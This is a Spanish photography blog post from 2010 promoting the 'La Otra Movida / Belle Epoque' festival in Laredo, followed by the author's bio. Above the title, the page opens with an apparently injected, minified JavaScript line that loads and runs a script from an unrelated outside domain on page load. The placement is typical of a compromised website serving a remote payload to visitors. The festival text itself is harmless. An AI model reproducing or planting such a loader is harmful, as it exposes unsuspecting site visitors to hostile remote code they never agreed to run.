;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Laredo… LA OTRA MOVIDA! – de Palabras y Fotografía – elreylagarton

By J.Manuel -elreylagarton- 29 junio, 2010 In Otras Cosas

Laredo… LA OTRA MOVIDA!

 

 LAREDO REVIVIRÁ LOS AÑOS 60, 70 y 80 en JULIO Se trata sin nostalgia de recordar aquella época, haciendo un homenaje de los movimientos artísticos y socio-culturales de entonces.

 

El proyecto está apoyado por el Ayuntamiento de Laredo, La Consejería de Turismo, Cultura y Deportes del Gobierno de Cantabria y Xacobeo Cantabria 2010, entra las muchas acciones a desarrollar destacan:
El Lunes 12 de Julio se presentará el Festival y se Inaugurará del “Paseo de las Artes” de Laredo con la presencia de Arturo Fernandez y otros personajes destacados.

  • Exposición de Fotos de Paco Manzano (Madrid) sobre la movida  nacional de aquellos años entre la que se encuentra destacada Laredo.
  • Conciertos Gratuitos de: bandas de la época locales, bandas tributo y los más destacados artistas de la época.
  • Charlas coloquio – Café Teatro
  • Actividades Infantiles
  • Graffitis – Cultura Urbana – Quedadas puestas de sol.
  • Todo el pueblo participa en la fiesta con los concursos de:

 

  • • Disfraces y Ambientación de Agrupaciones •Fiestas temáticas en locales de ocio nocturno
    • Ambientación y decoración de comercios y hostelería
    • Semana del Pincho
    • Personaje “La Otra Movida – Belle Epoque”
  • Proyección y actos culturales en torno al 50 aniversario del rodaje de “El Coloso de Rodas” en Laredo.
  • Mercado Hippie  

     

Desfiles, decoración, exposiciones,  audiovisuales, la Puebla Vieja volverá a tener el ambiente de aquellos años… en definitiva una multitud de actividades que harán de Laredo el sitio de “La Otra Movida – La Movida de Laredo”.  
 
 

ÁNIMATE Y VEN!… QUE ESTO VA A SER LA LECHE EN VERSO, PALABRA DE (REY)LAGARTÓN…

Más información en: www.laotramovida.com

Visita mi web: El Desván de la Imagen

 

Laredo desarrollará durante los días 15-16-17-18 de Julio el festival “Belle Epoque – La Otra Movida”. El Evento trata de rememorar la época en la que Laredo era cuna del veraneo de franceses y una de las principales ciudades turísticas de Europa a la que asistían estrellas de todo tipo.

Leave a reply

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Ego sum

yo

J.Manuel Sánchez elreylagarton

Su pasión incondicional por la fotografía, el arte y la cultura le ha llevado a formarse como profesor de fotografía, fotógrafo social, musical y de eventos, además de realizar exposiciones individuales y colectivas y a colaborar con diferentes medios de comunicación y agencias, que han publicado muchas de sus fotografías.

Retratista de la realidad que le rodea. Ambicioso, atrevido y fiel a su forma de entender la vida.

Currículum